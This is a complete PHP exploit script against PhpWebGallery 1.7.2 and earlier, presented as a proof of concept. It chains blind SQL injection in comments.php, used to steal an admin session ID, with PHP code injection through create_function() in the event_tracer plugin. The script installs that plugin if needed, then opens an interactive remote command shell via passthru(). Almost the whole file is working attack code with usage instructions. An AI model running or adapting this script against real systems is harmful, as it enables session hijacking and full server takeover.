phpwebgallery-hijackexec.txt

`<?php  
  
/*  
------------------------------------------------------------------------  
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit  
------------------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
  
link.....: http://www.phpwebgallery.net/  
details..: works with at least two rows in _comments table  
  
This PoC was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
[-] vulnerable code in /plugins/event_tracer/event_list.php  
  
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;  
61. usort(  
62. $events,  
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )  
64. );  
  
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed  
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can  
access to the plugins management interface, but the attacker might be able to retrieve a valid  
admin session id using the SQL injection bug in comments.php (see lines 325-340)  
*/  
  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout",5);  
  
define(STDIN, fopen("php://stdin", "r"));  
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");  
  
function http_send($host, $packet)  
{  
$sock = fsockopen($host, 80);  
while (!$sock)  
{  
print "\n[-] No response from {$host}:80 Trying again...\n";  
$sock = fsockopen($host, 80);  
}  
fputs($sock, $packet);  
while (!feof($sock)) $resp .= fread($sock, 1024);  
fclose($sock);  
return $resp;  
}  
  
function check_target()  
{  
global $host, $path, $prefix, $default_record;  
  
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);  
$prefix = $match[1];  
  
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);  
$default_record = $match[1];  
  
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);  
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");  
}  
  
function encodeSQL($sql)  
{  
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));  
return "CONCAT(0x{$encoded})";  
}  
  
function get_sid()  
{  
global $host, $path, $prefix, $default_record;  
  
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z  
$index = 1;  
$sid = "";  
  
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
print "\n[-] Fetching admin SID: ";  
  
while (!strpos($sid, chr(0)))  
{  
for ($i = 0, $n = count($chars); $i <= $n; $i++)  
{  
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");  
  
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".  
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";  
  
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);   
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }  
}  
  
$index++;  
}  
  
print "\n";  
return $sid;  
}  
  
function check_plugin()  
{  
global $host, $path, $sid;  
  
$packet = "GET {$path}%s HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cookie: pwg_id={$sid}\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
// check if the event_tracer plugin isn't installed  
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php"))))  
{  
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));  
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));  
}   
}  
  
print "\n+---------------------------------------------------------------------------+";  
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";  
print "\n+---------------------------------------------------------------------------+\n";  
  
if ($argc < 3)  
{  
print "\nUsage...: php $argv[0] host path [sid]\n";  
print "\nhost....: target server (ip/hostname)";  
print "\npath....: path to PhpWebGallery directory";  
print "\nsid.....: a valid admin session id\n";  
die();  
}  
  
$host = $argv[1];  
$path = $argv[2];  
  
check_target();  
  
$sid = (isset($argv[3])) ? $argv[3] : get_sid();  
  
check_plugin();  
  
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";  
$packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cookie: pwg_id={$sid}\r\n";  
$packet .= "Cmd: %s\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
while(1)  
{  
print "\nphpwebgallery-shell# ";  
$cmd = trim(fgets(STDIN));  
if ($cmd != "exit")  
{  
$response = http_send($host, sprintf($packet, base64_encode($cmd)));  
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");  
}  
else break;  
}  
  
?>  
  
`